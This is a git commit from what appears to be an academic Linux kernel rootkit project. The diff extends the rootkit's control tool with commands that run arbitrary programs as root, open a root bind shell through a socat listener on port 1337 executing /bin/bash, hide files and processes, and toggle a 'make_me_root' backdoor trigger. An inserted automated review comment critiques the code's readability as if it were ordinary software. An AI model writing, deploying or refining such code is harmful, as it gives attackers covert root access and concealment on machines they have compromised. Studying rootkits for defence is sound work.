linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 09f487de7866e24995d29dd8ce99b23c369e7d65
parent fbe2cb88bab55c1b79f0d705b8966b718d938c2d
Author: deurzen <m.deurzen@tum.de>
Date:   Sat, 28 Nov 2020 12:16:14 +0100

refactors code

Diffstat:
Msrc/channel.c | 3+++
Msrc/ioctl.h | 4++--
Msrc/rkctl/rkctl.c | 15+++++++++------
3 files changed, 14 insertions(+), 8 deletions(-)

diff --git a/src/channel.c b/src/channel.c
@@ -21,6 +21,9 @@ report_channels(void)
 DEBUG_NOTICE("listening on the following channels\n");
 DEBUG_NOTICE("%-24s %#10lx\n", "PING", G7_PING);
 DEBUG_NOTICE("%-24s %#10lx\n", "FILEHIDE", G7_FILEHIDE);
+ DEBUG_NOTICE("%-24s %#10lx\n", "BACKDOOR", G7_BACKDOOR);
+ DEBUG_NOTICE("%-24s %#10lx\n", "TOGGLEBD", G7_TOGGLEBD);
+ DEBUG_NOTICE("%-24s %#10lx\n", "HIDEPID", G7_HIDEPID);
 DEBUG_NOTICE("-----------------------------------\n");
 }
 
diff --git a/src/ioctl.h b/src/ioctl.h
@@ -4,10 +4,10 @@
 #define G7_MAGIC_NUMBER '@'
 #define G7_DEVICE "g7rkp"
 
-#define G7_PING _IOWR(G7_MAGIC_NUMBER, 0x0, char *)
+#define G7_PING _IOWR(G7_MAGIC_NUMBER, 0x0, char *)
 #define G7_FILEHIDE _IOR(G7_MAGIC_NUMBER, 0x1, char *)
 #define G7_BACKDOOR _IOR(G7_MAGIC_NUMBER, 0x2, char *)
 #define G7_TOGGLEBD _IOR(G7_MAGIC_NUMBER, 0x3, char *)
-#define G7_HIDEPID _IOR(G7_MAGIC_NUMBER, 0x4, char *)
+#define G7_HIDEPID _IOR(G7_MAGIC_NUMBER, 0x4, char *)
 
 #endif//_GROUP7_IOCTL_H
diff --git a/src/rkctl/rkctl.c b/src/rkctl/rkctl.c
@@ -52,20 +52,22 @@ parse_input(int argc, char **argv)
 return (cmd_t){ handle_backdoor, (void *)argv[2] };
 }
 
- if (ARGVCMP(1, "shell")) {
+ if (ARGVCMP(1, "shell"))
 return (cmd_t){ handle_shellbd, NULL };
- }
 
 if (ARGVCMP(1, "backdoor-use-tty")) {
 ASSERT_ARGC(2, "backdoor-use-tty <0 | 1>");
 
 if (ARGVCMP(2, "0"))
- return (cmd_t){ handle_togglebd, (void *)0 };
+ return (cmd_t){ handle_togglebd, (void *)-1 };
 
 if (ARGVCMP(2, "1"))
 return (cmd_t){ handle_togglebd, (void *)1 };
 }
 
+ if (ARGVCMP(1, "backdoor-off"))
+ return (cmd_t){ handle_togglebd, (void *)0 };
+
 if (ARGVCMP(1, "hidepid")) {
 ASSERT_ARGC(3, "hidepid <add | remove> <PID>");
 // TODO: return hidepid handle
@@ -99,7 +101,7 @@ handle_shellbd(void *arg)
 const char *socat_cmd = "socat tcp4-listen:1337,reuseaddr,fork"
 " exec:/bin/bash,pty,stderr,setsid";
 
- int ret = issue_ioctl(G7_BACKDOOR, socat_cmd);
+ issue_ioctl(G7_BACKDOOR, socat_cmd);
 
 char *argv[] = { "nc",
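Review bot: The three values parse_input hands to handle_togglebd — `(void *)-1` for `backdoor-use-tty 0`, `(void *)1` for `backdoor-use-tty 1`, and `(void *)0` for the new `backdoor-off` — are bare integer-to-pointer casts whose meaning lives only in handle_togglebd, which is outside this hunk, and this commit silently changes what 0 means. A comment at the first of them, `/* handle_togglebd mode: -1 = read-triggered, 1 = tty-triggered, 0 = disabled (see help()) */`, or named constants in place of the three literals, would keep the encoding readable; the meanings are taken from the help() text in the last hunk, so confirm them against handle_togglebd. Separately, a `backdoor-use-tty` argument that is neither "0" nor "1" returns nothing from that branch and falls through to the later checks, assuming ASSERT_ARGC only validates the argument count; parse_input's end is outside the hunk, so what that fall-through eventually yields is not visible here.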
@@ -108,8 +110,7 @@ handle_shellbd(void *arg)
 NULL
 };
 
- execve(argv[0], argv, NULL);
- return ret;
+ return execve(argv[0], argv, NULL);
 }
 
 int
@@ -150,6 +151,8 @@ help()
 printf("%-32s %s\n", "ping", "send an echo request to the rootkit");
 printf("%-32s %s\n", "filehide <toggle | on | off>", "{,un}hide files");
 printf("%-32s %s\n", "backdoor <execve_command>", "exec a command as root");
+ printf("%-32s %s\n", "shell", "obtain a shell as root");
 printf("%-32s %s\n", "backdoor-use-tty <0 | 1>", "listen for `make_me_root` on read (0) or tty (1)");
+ printf("%-32s %s\n", "backdoor-off", "disable any (read or tty) backdoor");
 printf("%-32s %s\n", "hidepid <add | remove> <PID>", "{,un}hide a process");
 }